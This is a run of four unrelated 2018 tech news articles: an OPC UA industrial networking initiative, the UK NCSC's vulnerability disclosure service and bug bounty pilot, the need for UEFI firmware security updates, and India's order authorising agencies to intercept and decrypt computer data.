Rockwell Automation and a group of automation organizations have joined an OPC Foundation initiative to extend the OPC UA protocol. Specifically, a series of working groups has formed to bring the OPC UA protocol’s vendor-independent, end-to-end interoperability out to devices in the field. The initiative plans to address use cases not currently in scope for EtherNet/IP. The goal is to help simplify other use cases―especially in multi-vendor, controller-to-controller environments and for the vertical integration of field devices.


New Initiative Takes OPC UA Out to Field Devices

Here are the logos of the companies involved in the initiative to bring OPC UA to field devices. (Image source: Rockwell Automation)

Rockwell sees the need to extend OPC UA as part of the build-out of advanced manufacturing. “Smart manufacturing is making a number of things more relevant. Flexible manufacturing applications drive flexible communications. And analytics require more interaction between devices and software and devices and the cloud,” Paul Brooks, business development manager for networks at Rockwell Automation, told Design News . “As we look at that changing dynamic, we see places where OPC UA can add value. We’ve moved, and the OPC Foundation has moved, and we find ourselves in the middle.”

The companies involved in the initiative include: ABB, Beckhoff, Bosch-Rexroth, B&R, Cisco, Hilscher, Hirschmann, Huawei, Intel, Kalycito, KUKA, Mitsubishi Electric, Molex, Moxa, Omron, Phoenix Contact, Pilz, Rockwell Automation, Schneider Electric, Siemens, TTTech, Wago, and Yokogawa.

Building the Protocol Out to Field Devices

In a statement, Rockwell noted that the company is the primary author of the EtherNet/IP specifications and understands that EtherNet/IP users may see compatibility risks in technology developed for a different ecosystem. Rockwell intends to mitigate these risks through both its ongoing development of EtherNet/IP and its intentions for the OPC UA protocol. “We’ve been a member of OPC since it was founded. We were part of writing the specifications,” said Brooks. “We use OPC UA in many of our communications devices. We’ve been on this journey for 14 or 15 years.”

OPC UA is generally considered an inherently secure protocol, which is one of the advantages when taking it beyond the plant wall. “The OPC Foundation was one of the first organizations to bake security into the protocol,” said Brooks. “OPC UA is more present in software than other Ethernet protocols. We need to make sure all of the use cases include controller-device communications that get included into the analysis, and we need to make sure the security offering from OPC UA is sufficient down to the device.”

The Details and Priorities of the Initiative

Rockwell Automation’s priorities within the new OPC Foundation initiative include working to help ensure the following:

OPC UA specifications are written with the same level of rigor and completeness as the EtherNet/IP specifications.
Time-sensitive networking (TSN) is commonly applied across the OPC UA, EtherNet/IP, and PROFINET protocols, so all three can coexist on a common TSN-based network.
OPC UA pub/sub technology is implemented in a way that allows existing EtherNet/IP installations to support OPC UA devices.
OPC UA hardware requirements allow the protocol to be deployed on hardware platforms that are common in today’s EtherNet/IP components.
OPC UA software requirements allow the protocol to be deployed within current EtherNet/IP-centric software tools without significant changes to user workflows.
Conformance test practices mandated for EtherNet/IP reflect the necessary requirements for OPC UA conformance testing.

RELATED ARTICLES:

Industrial Ethernet: Moving toward a Single Network Vision

IIC Track and Trace Testbed Forges Requirements for IIoT Standard

Using Switching Technology to Overcome Automation Protocol Clash

Brooks noted that extending the OPC UA protocol out to field devices will be entirely up to each customer. “Our objective is that our customers get to choose when to use the technology rather than the technology making the decision,” said Brooks. “So, we build it and demonstrate its value to our customers. Then it’s up to them.”

Rob Spiegel has covered automation and control for 17 years, 15 of them for Design News . Other topics he has covered include supply chain technology, alternative energy, and cyber security. For 10 years, he was owner and publisher of the food magazine Chile Pepper.

Hack the Gov’t and Tell the NCSC? You’ll Now Get a Pat on the Back



It’s like a bug bounty programme but without the bounty, yet.

Security researchers who find vulnerabilities in UK government web services can now report them directly to the National Cyber Security Centre (NCSC), rather than wondering who to tell and whether they’ll get prosecuted for doing so.

That’s according to “Ollie”, the NCSC’s vulnerability disclosure lead, who announced a new vulnerability reporting service in a blog post published on Thursday.

The service acknowledges the “crucial role security researchers play in helping to secure UK government web services”, he wrote.

“The quickest way to remediate a security vulnerability is to report it to the system owner. However we appreciate that it can be hard to find the right contact, so researchers can now report the vulnerability to us .”


“Disclose vulnerabilities here”: white hats will be relieved by the commitments and clear point of contact.

NCSC Vulnerability Reporting: Pilot Bug Bounty Programme Also Live

Along with direct disclosure, it has also launched a pilot bug bounty programme through HackerOne, albeit sans bounty.

“We are keen to show our appreciation by issuing HackerOne reputation points to those that disclose”, the NCSC writes.

“Having a mature and co-ordinated vulnerability disclosure process helps decrease the risk of an incident occurring”, Ollie adds.

The pilot’s aim is to identify the best way to help fellow government organisations establish a vulnerability disclosure process. HackerOne has been selected as the bug bounty platform provider and NCC Group as the assessment partner.

The work my company @LutaSecurity is doing w @NCSC to ensure they are following vulnerability disclosure best practices is highlighted in a new blog by Ollie, the UK gov technical lead.

"The quickest way to remediate a security vulnerability is to report it to the system owner." https://t.co/Gx3l4b4xPO

― Katie Moussouris (@k8em0) December 19, 2018

Vulnerability disclosure authority Katie Moussouris’s Luta Security has been supporting the NCSC to ensure it is following industry best practice.

What is HackerOne?

HackerOne allows organisations to get their networks and applications tested for cyber vulnerabilities via its centralised platform by a largely freelance coterie of hackers. Those who can demonstrate successful exploits typically earn cash.

The UK arguably lags the US somewhat in this regard. The “Hack the Pentagon” crowd-sourced security programme with HackerOne launched in 2016 and has resulted in the resolution of over 3,000 security vulnerabilities thus far.

The US’s Hack the Army programme in December 2016 surfaced 118 valid vulnerabilities and paid out $100,000. The first Hack the Air Force bug bounty challenge resulted in 207 valid reports, and hackers earned more than $130,000.

Chris Wallis, founder of Intruder, told Computer Business Review: “It’s great to see the NCSC rolling out a vulnerability disclosure programme for the U.K. Government. No organisation can hope to secure every last piece of the puzzle, so these programmes are now a crucial step for any mature cyber security operation. Many security researchers will delight in the kudos of finding weaknesses in Government systems, although for some there will remain the temptation to sell vulnerabilities to the highest bidder, especially while no monetary rewards are on offer.”

Disclosures Exempt from Equities Process

The NCSC adds: “Given the recent GCHQ publication , it’s also important to highlight that anything reported to us is exempt from the equities process and will be disclosed.”

It was referring to a recent publication that detailed why and when UK intelligence services choose not to disclose vulnerabilities in software.

See also: Landmark GCHQ Publication Reveals Vulnerability Disclosure Process

With regard to the bug bounty programme, Charl van der Walt, Chief Security Strategy Officer for SecureData Europe, earlier told Computer Business Review: “Bug bounty programmes have absolutely been a good thing.”

“They’ve given the offensive side of the fence a way to cleanly monetise vulnerabilities (selling on the black market is tricky; how do you know you’re not selling to a cop?) and generated a lot of really useful data.”

He added: “I was recently asked if participating is a bit like ‘painting a target on your head’. The short answer is no: there is no way of staying under the radar.”

“The bad guys will find you anyway. And these programmes can also really motivate a company: CISOs rarely get enough attention and participation seems to galvanise executives; things start happening that never did before.”

Why Your PC’s UEFI Firmware Needs Security Updates



Microsoft just announced Project Mu , promising “firmware as a service” on supported hardware. Every PC manufacturer should take note. PCs need security updates to their UEFI firmware, and PC manufacturers have done a poor job of delivering them.

What Is UEFI Firmware?

Modern PCs use UEFI firmware instead of a traditional BIOS. The UEFI firmware is the low-level software that starts when you boot your PC. It tests and initializes your hardware, does some low-level system configuration, and then boots an operating system from your computer’s internal drive or another boot device.

However, UEFI is a little more complicated than the older BIOS software. For example, computers with Intel processors have something called the Intel Management Engine , which is basically a tiny operating system. It runs in parallel to Windows, Linux, or whatever operating system you’re running on your computer. On corporate networks, system administrators can use features in the Intel ME to remotely manage their computers.

UEFI also contains processor “microcode,” which is kind of like firmware for your processor. When your computer boots, it loads microcode from the UEFI firmware. Think of it like an interpreter that translates software instructions to hardware instructions performed on the CPU.

RELATED: What Is UEFI, and How Is It Different from BIOS?

Why UEFI Firmware Needs Security Updates

The last few years have shown over and over why UEFI firmware needs timely security updates.

We all learned about Spectre in 2018, which exposed serious architectural problems with modern CPUs. Problems with something called “speculative execution” meant programs could escape standard security restrictions and read protected areas of memory. Fixes for Spectre required CPU microcode updates to function correctly. That means PC manufacturers had to update all their laptop and desktop PCs―and motherboard manufacturers had to update all their motherboards―with new UEFI firmware containing the updated microcode. Your PC isn’t adequately protected against Spectre unless you’ve installed a UEFI firmware update. AMD also released microcode updates to protect systems with AMD processors from Spectre attacks, so this isn’t just an Intel thing.

Intel’s Management Engine has seen some security bugs that could either let attackers with local access to the computer crack the Management Engine software, or let an attacker with remote access cause trouble. Luckily, the remote exploits only affected businesses who had enabled Intel Active Management Technology (AMT), so average consumers weren’t affected.

These are just a few examples. Researchers have also demonstrated that it’s possible to abuse the UEFI firmware on some PCs, using it to gain deep access to the system. They’ve even demonstrated persistent ransomware that gained access to a computer’s UEFI firmware and ran from there.

The industry should be updating every computer’s UEFI firmware just like any other software to help protect against these problems and similar flaws in the future.

RELATED: How to Check if Your PC or Phone Is Protected Against Meltdown and Spectre

How the Update Process Has Been Broken for Years

The BIOS update process has been a mess forever―since long before UEFI. Traditionally, computers shipped with that old-school BIOS, and less could go wrong. PC manufacturers might ship a few BIOS updates to fix minor problems, but the usual advice was to avoid installing them if your PC was working properly. You often had to boot from a bootable DOS drive to flash the BIOS update, and everyone heard stories of BIOS updates failing and bricking PCs, rendering them unbootable.

Things have changed. UEFI firmware does a lot more, and Intel has released several big updates to things like CPU microcode and the Intel ME in the past few years. Whenever Intel releases such an update, all Intel can do is say “ask your computer manufacturer.” Your computer manufacturer―or motherboard manufacturer, if you built your own PC―has to take the code from Intel and integrate it into a new UEFI firmware version. They then have to test the firmware. Oh, and each manufacturer has to repeat this process for every individual PC they sell, as they all have different UEFI firmware. It’s the kind of manual work that made Android phones so difficult to update in the past.

In practice, this means it often takes a long time―many months―to get critical security updates that have to be delivered via UEFI. It means manufacturers might shrug and refuse to update PCs that are just a few years old. And, even when manufacturers do release updates, those updates are often buried on the manufacturer’s support website. Most PC users won’t ever discover that those UEFI firmware updates exist, let alone install them, so these bugs end up living on in existing PCs for a long time. And some manufacturers still make you install firmware updates by booting into DOS first―just to make it extra complicated.

What People Are Doing About It

That’s a mess. We need a streamlined process where manufacturers can more easily create new UEFI firmware updates. We also need a better process for releasing those updates, so users can get them automatically installed on their PCs. Right now the process is slow and manual―it should be fast and automatic.

That’s what Microsoft is trying to do with Project Mu. Here’s how the official documentation explains it:

Mu is built around the idea that shipping and maintaining a UEFI product is an ongoing collaboration between numerous partners. For too long the industry has built products using a “forking” model combined with copy/paste/rename and with each new product the maintenance burden grows to such a level that updates are near impossible due to cost and risk.

Project Mu is all about helping PC manufacturers create and test UEFI updates faster by streamlining the UEFI development process and helping everyone work together. Hopefully, this is the missing piece, as Microsoft has already made it easier for PC manufacturers to send their UEFI firmware updates to users automatically.

Specifically, Microsoft lets PC manufacturers issue firmware updates through Windows Update and has provided documentation on this since at least 2017. Microsoft also announced Component Firmware Update , an open-source model that manufacturers can use to update UEFI and other firmware, back in October 2018. If PC manufacturers get on board with this, they could deliver firmware updates to all their users very quickly.

This isn’t just a Windows thing, either. Over on Linux, developers are trying to make it easier for PC manufacturers to issue UEFI updates with LVFS , the Linux Vendor Firmware Service. PC vendors can submit their updates, and they’ll appear for download in the GNOME Software application, which is used on Ubuntu and many other Linux distributions. This effort dates back to 2015. PC manufacturers like Dell and Lenovo are participating.

These solutions for Windows and Linux affect more than just UEFI updates, too. Hardware manufacturers could use them to update everything from USB mouse firmware to solid-state drive firmware in the future.

As SwiftOnSecurity put it when talking about the problems with solid-state drive firmware and encryption , firmware updates can be reliable. We need to expect better from hardware manufacturers.

Firmware updates can be reliable. I have initiated at least 3,000 Dell BIOS updates with only one failure, and that old PC was already in service for failing.

Re-think what you think is impossible. Firmware servicing is not impossible or risky. It requires people demand better.

― SwiftOnSecurity (@SwiftOnSecurity) November 6, 2018

Indian government to intercept, monitor, and decrypt citizens’ computers


The Indian government has authorized 10 central agencies to intercept, monitor, and decrypt data on any computer, sending a shock wave through citizens and privacy watchdogs.

Narendra Modi’s government late Thursday broadened the scope of Section 69 of the nation’s IT Act, 2000 to require a subscriber, service provider, or any person in charge of a computer to “extend all facilities and technical assistance to the agencies.” Failure to comply with the agencies could result in seven years of imprisonment and an unspecified fine.

In a clarification posted today, the Ministry of Home Affairs said each case of interception, monitoring, and decryption is to be approved by the competent authority, which is the Union Home Secretary.

The agencies that have been authorized with this new power are the Intelligence Bureau, Narcotics Control Bureau, Enforcement Directorate, Central Board of Direct Taxes, Directorate of Revenue Intelligence, Central Bureau of Investigation, National Investigation Agency, Research and Analysis Wing, Directorate of Signal Intelligence (in service areas of J-K, North East and Assam), and Delhi Police.

Explaining the rationale behind the order, India’s IT minister, Ravi Shankar Prasad, said that the measure was undertaken in the interests of national security. He added that some form of “tapping” has already been going on in the country for a number of years and that the new order would help bring structure to that process. “Always remember one thing,” he said in a televised interview. “Even in the case of a particular individual, the interception order shall not be effective unless affirmed by the Home Secretary.”

Apprehension among citizens

The Internet Freedom Foundation, a nonprofit organization that protects the online rights of citizens in India, cautioned that the order goes beyond telephone tapping. It includes looking at content streams and might even involve breaking encryption in some cases. “Imagine your search queries on Google over [a number of] years being demanded ― mixed with your WhatsApp metadata, who you talk to, when, and how much [and add] layers of data streams from emails + Facebook,” it said .

“To us this order is unconstitutional and in breach of the telephone tapping guidelines, the Privacy Judgement and the Aadhaar Judgement,” it asserted, adding that it was working with volunteers and lawyers to further scrutinize the order.

Opposition political parties also expressed concern about the order. “From Modi sarkar [Hindi for government] to stalker sarkar, clearly the string of losses has left the BJP government desperate for information,” the Congress political party said. Senior Congress leader P Chidambaram added , “If anybody is going to monitor the computer, including your computer, that is the Orwellian state. George Orwell is around the corner. It is condemnable.”

This is overbroad, has a chilling effect and is liable to be struck down in toto: still amazing how many government actions on online regulation have been straight up, ex-facie unconstitutional. https://t.co/nOhI8vA2Tx

― Karuna Nundy (@karunanundy) December 21, 2018

IT minister Prasad lashed out at the opposition, asking whether they believe the government should not do anything to halt the proliferation of terrorist activities, which he alleged are being conducted on the internet.

VentureBeat has reached out to Apple, Google, Facebook, and Amazon to hear their comment. Microsoft declined to comment.

Global issue

The move by the Indian government comes days after the Australian government, in a global first, took a stricter approach to the way communications services are handled within its borders. Earlier this month, the Australian parliament passed laws giving police and security agencies in the nation the power to access messages on encrypted platforms. The government said it is taking this step in an attempt to combat terrorism and other crime.
